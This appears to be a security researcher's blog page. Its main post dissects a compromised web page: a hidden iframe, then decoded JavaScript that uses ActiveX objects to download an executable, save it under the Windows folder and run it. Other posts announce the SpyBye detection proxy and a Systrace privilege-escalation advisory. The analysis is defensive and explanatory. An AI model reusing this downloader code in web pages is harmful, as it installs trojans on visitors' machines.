Skip to content

Anatomy of a typical exploit

Here is a typical example of a compromised web page. Due to a bug in a web application like phpBB2, Moveable Type or many others, the adversary was able to insert the following line of HTML into your home page:

<iframe src="" width="0" height="0"></iframe>

When visiting your home page, the single line of HTML causes your web browser to load additional content from an external web server. When looking at the content behind, we find something incomprehensible to us. It's a block of javascript that consists only of numbers. Just by looking at it, we have no idea what the code might do:

[many more lines of numbers]

However, it's pretty straight forward to decipher this if you have bookmarked javascript shell - just search for it. When using jshell to evaluate the javascript from above, it decodes to the following:

<script language=javascript> var url,path,var1,var2,var3,var4;
path="C:\\windows\\IsUno104.exe"; var1="Microsoft.xmlhttp";
var2="Adodb.Stream"; var3="Shell.Application";
var var4_1="clsid:BD96C556-65A"; var var4_2="3-11D0-983A-00C04FC29E36";
try{var ado=(document.createElement("object"));
ado.setAttribute("classid",var4); var xml=ado.CreateObject(var1,"");
var as=ado.createobject(var2,""); xml.Open("GET",url,0); xml.Send();
as.savetofile(path,2);as.close();var shell=ado.createobject(var3,"");

This resulting javascript uses XMLRPC to download a binary from the Internet. It saves it on your local hard drive and then uses an ActiveX object to execute it. According to ClamAV, the executable is a Trojan-Downloader. This means that it is an application that can download an arbitrary number of other executables on your computer that can then happily sniff your passwords, compromise your bank accounts, display popups or use your computer to send spam.

All of this with just a single line of HTML. Amazing? Right!

The actual example had some more indirections and also threw in some additional visual basic script plus some other goodies that would have complicated our explanation.
Categories: Malware, SpyBye
Defined tags for this entry: , ,

Running your own instance of SpyBye

The simplest way to get exposure to SpyBye is to configure your browser to use as proxy. However, this is likely to be slow as your are sharing the proxy with other users and are constrained by the limited bandwidth in my closet. You can now download the SpyBye software yourself from and run it on your own servers.

For detailed installation instructions, please consult the following article. Hopefully, there is enough information there, to get you up and running in a matter of minutes.

Happy Hunting.

Categories: SpyBye

SpyBye launches

SpyBye is a tool to help web masters determine if their web pages are hosting browser exploits that can infect visiting users with malware. It functions as an HTTP proxy server and intercepts all browser requests. SpyBye uses a few simple rules to determine if embedded links on your web page are harmlesss, unknown or maybe even dangerous.

To try SpyBye, configure your browser to use as proxy server and then go visit

How does SpyBye work? SpyBye operates as a proxy server and gets to see all the web fetches that your browser makes. It applies very simple rules to each URL that is fetched as a result of loading a web page. These rules allows us to classify a URL into three categories: harmless, unknown or dangerous. Although, there is great margin of error, the categories allow a web master to look at the URLs and determine if they should be there or not. If you see that a URL is being fetched that you would not expect, it's a good indication you have been copromised.

Why did you write SpyBye? It has become increasingly common for web sites to get compromised. This can happen either due to vulnerable web applications that you run or due to compromised servers via vectors completely out of your control. Nonetheless, it is important for web masters to be able to tell if their pages are dangerous to their users. SpyBye provides a very simple mechanism to determine how a site works on the HTTP level. This often gives us clues about potentially dangerous content. I hope that SpyBye can be of use to anyone who wants to verify if their web site could be compromised and dangerous. The unoffical explanation is that I needed some code to test libevent's HTTP layer; writing a proxy exercises most of the code paths.

In a couple of days, SpyBye is going to be released as Open Source package, so that you can run your own proxy and check your pages.

Disclaimer SpyBye does not protect you from getting exploited yourself. It tries to take reasonable precautions to avoid infection while using it. However, ideally, you would run your browser in a virtual machine and revert to a clean snapshot when done. You have been warned. Today's malware is capable of rendering your computer unusable - and empty your bank accounts!
Categories: SpyBye

Local Privilege Escalation

Chris Evans from Google Security discovered an integer overflow in the Systrace kernel code. If an adversary can open "/dev/systrace", the bug can be leveraged to gain root access. Both OpenBSD and NetBSD current have been patched. Please, update your systems.
Categories: Systrace

Breaker!! 17 years ago...

I was going to do some late night hacking but then I found this. My first game. I wrote this in 1989 for the Amiga. I feared that this great work(!) might have been forever lost but I just found a copy of it on some warez server. The games comes with a level editor. I was esp. proud of the level editor because I used run-length encoding to compress the levels. The editor supported up to 1,000.
Categories: Hacking
Defined tags for this entry: , ,

Hacking Too Much

Been travelling and working too much on other stuff lately to make much progress with Systrace. The ptrace version works reliably enough on Linux without the kernel patch. Although, it sometimes still leaves zombie processes behind which is kind of annoying. Performance without kernel patch takes a 100% hit, too. Marius has promised to revamp the kernel patches and make them more Linux friendly. Maybe, we will be able to get them into mainline Linux then. Stay tuned.
Categories: Hacking